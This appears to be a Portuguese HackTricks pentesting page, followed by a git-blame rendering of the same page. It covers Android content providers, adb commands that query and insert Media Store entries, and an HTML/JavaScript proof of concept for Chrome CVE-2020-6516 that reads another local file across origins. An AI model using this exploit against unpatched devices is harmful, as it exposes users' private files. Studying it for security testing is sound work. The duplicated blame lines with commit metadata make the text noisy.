hacktricks/mobile-pentesting/android-app-pentesting/content-protocol.md

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}

<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}

**Este é um resumo do post [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**

### Listando Arquivos no Media Store
Para listar arquivos gerenciados pelo Media Store, o comando abaixo pode ser usado:
```bash
$ content query --uri content://media/external/file
```
Para uma saída mais amigável, exibindo apenas o identificador e o caminho de cada arquivo indexado:
```bash
$ content query --uri content://media/external/file --projection _id,_data
```
Os provedores de conteúdo estão isolados em seu próprio namespace privado. O acesso a um provedor requer o URI específico `content://`. Informações sobre os caminhos para acessar um provedor podem ser obtidas a partir de manifests de aplicativos ou do código-fonte do framework Android.

### Acesso do Chrome aos Provedores de Conteúdo
O Chrome no Android pode acessar provedores de conteúdo através do esquema `content://`, permitindo que acesse recursos como fotos ou documentos exportados por aplicativos de terceiros. Para ilustrar isso, um arquivo pode ser inserido no Media Store e, em seguida, acessado via Chrome:

Insira uma entrada personalizada no Media Store:
```bash
cd /sdcard
echo "Hello, world!" > test.txt
content insert --uri content://media/external/file \
--bind _data:s:/storage/emulated/0/test.txt \
--bind mime_type:s:text/plain
```
Descubra o identificador do arquivo recém-inserido:
```bash
content query --uri content://media/external/file \
--projection _id,_data | grep test.txt
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt
```
O arquivo pode ser visualizado no Chrome usando uma URL construída com o identificador do arquivo.

Por exemplo, para listar arquivos relacionados a um aplicativo específico:
```bash
content query --uri content://media/external/file --projection _id,_data | grep -i <app_name>
```
### Chrome CVE-2020-6516: Bypass da Política de Mesma Origem

A _Política de Mesma Origem_ (SOP) é um protocolo de segurança em navegadores que restringe páginas da web de interagir com recursos de origens diferentes, a menos que explicitamente permitido por uma política de Compartilhamento de Recursos de Origem Cruzada (CORS). Esta política visa prevenir vazamentos de informações e falsificação de requisições entre sites. O Chrome considera `content://` como um esquema local, implicando regras SOP mais rigorosas, onde cada URL de esquema local é tratada como uma origem separada.

No entanto, a CVE-2020-6516 foi uma vulnerabilidade no Chrome que permitiu um bypass das regras SOP para recursos carregados via uma URL `content://`. Na prática, o código JavaScript de uma URL `content://` poderia acessar outros recursos carregados via URLs `content://`, o que era uma preocupação significativa de segurança, especialmente em dispositivos Android que executavam versões anteriores ao Android 10, onde o armazenamento escopado não estava implementado.

A prova de conceito abaixo demonstra essa vulnerabilidade, onde um documento HTML, após ser carregado em **/sdcard** e adicionado ao Media Store, usa `XMLHttpRequest` em seu JavaScript para acessar e exibir o conteúdo de outro arquivo no Media Store, contornando as regras SOP.

Prova de Conceito HTML:
```xml
<html>
<head>
<title>PoC</title>
<script type="text/javascript">
function poc()
{
var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function()
{
if(this.readyState == 4)
{
if(this.status == 200 || this.status == 0)
{
alert(xhr.response);
}
}
}

xhr.open("GET", "content://media/external/file/747");
xhr.send();
}
</script>
</head>
<body onload="poc()"></body>
</html>
```
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporte o HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-05-02 15:04:03 +00:00			`<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>`
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:51 +00:00
			`{% embed url="https://websec.nl/" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`Este é um resumo do post [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`### Listando Arquivos no Media Store`
			`Para listar arquivos gerenciados pelo Media Store, o comando abaixo pode ser usado:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
			`$ content query --uri content://media/external/file`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`Para uma saída mais amigável, exibindo apenas o identificador e o caminho de cada arquivo indexado:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
			`$ content query --uri content://media/external/file --projection _id,_data`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			Os provedores de conteúdo estão isolados em seu próprio namespace privado. O acesso a um provedor requer o URI específico `content://`. Informações sobre os caminhos para acessar um provedor podem ser obtidas a partir de manifests de aplicativos ou do código-fonte do framework Android.
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00
			`### Acesso do Chrome aos Provedores de Conteúdo`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			O Chrome no Android pode acessar provedores de conteúdo através do esquema `content://`, permitindo que acesse recursos como fotos ou documentos exportados por aplicativos de terceiros. Para ilustrar isso, um arquivo pode ser inserido no Media Store e, em seguida, acessado via Chrome:
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`Insira uma entrada personalizada no Media Store:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`cd /sdcard`
			`echo "Hello, world!" > test.txt`
			`content insert --uri content://media/external/file \`
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-06 23:35:31 +00:00			`--bind _data:s:/storage/emulated/0/test.txt \`
			`--bind mime_type:s:text/plain`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`Descubra o identificador do arquivo recém-inserido:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`content query --uri content://media/external/file \`
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-06 23:35:31 +00:00			`--projection _id,_data \| grep test.txt`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`O arquivo pode ser visualizado no Chrome usando uma URL construída com o identificador do arquivo.`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`Por exemplo, para listar arquivos relacionados a um aplicativo específico:`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```bash
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`content query --uri content://media/external/file --projection _id,_data \| grep -i <app_name>`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			```
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			`### Chrome CVE-2020-6516: Bypass da Política de Mesma Origem`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			A _Política de Mesma Origem_ (SOP) é um protocolo de segurança em navegadores que restringe páginas da web de interagir com recursos de origens diferentes, a menos que explicitamente permitido por uma política de Compartilhamento de Recursos de Origem Cruzada (CORS). Esta política visa prevenir vazamentos de informações e falsificação de requisições entre sites. O Chrome considera `content://` como um esquema local, implicando regras SOP mais rigorosas, onde cada URL de esquema local é tratada como uma origem separada.
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			No entanto, a CVE-2020-6516 foi uma vulnerabilidade no Chrome que permitiu um bypass das regras SOP para recursos carregados via uma URL `content://`. Na prática, o código JavaScript de uma URL `content://` poderia acessar outros recursos carregados via URLs `content://`, o que era uma preocupação significativa de segurança, especialmente em dispositivos Android que executavam versões anteriores ao Android 10, onde o armazenamento escopado não estava implementado.
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			A prova de conceito abaixo demonstra essa vulnerabilidade, onde um documento HTML, após ser carregado em /sdcard e adicionado ao Media Store, usa `XMLHttpRequest` em seu JavaScript para acessar e exibir o conteúdo de outro arquivo no Media Store, contornando as regras SOP.
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-05-02 15:04:03 +00:00			`Prova de Conceito HTML:`
Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'exploiti 2024-02-05 03:11:06 +00:00			```xml
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			`<html>`
			`<head>`
Translated ['linux-unix/privilege-escalation/docker-breakout.md', 'linux 2024-01-06 23:35:31 +00:00			`<title>PoC</title>`
			`<script type="text/javascript">`
			`function poc()`
			`{`
			`var xhr = new XMLHttpRequest();`

			`xhr.onreadystatechange = function()`
			`{`
			`if(this.readyState == 4)`
			`{`
			`if(this.status == 200 \|\| this.status == 0)`
			`{`
			`alert(xhr.response);`
			`}`
			`}`
			`}`

			`xhr.open("GET", "content://media/external/file/747");`
			`xhr.send();`
			`}`
			`</script>`
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00			`</head>`
			`<body onload="poc()"></body>`
			`</html>`
			```
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-05-02 15:04:03 +00:00			`<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>`
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:51 +00:00
			`{% embed url="https://websec.nl/" %}`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`<summary>Supporte o HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para os [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:35:54 +00:00			`{% endhint %}`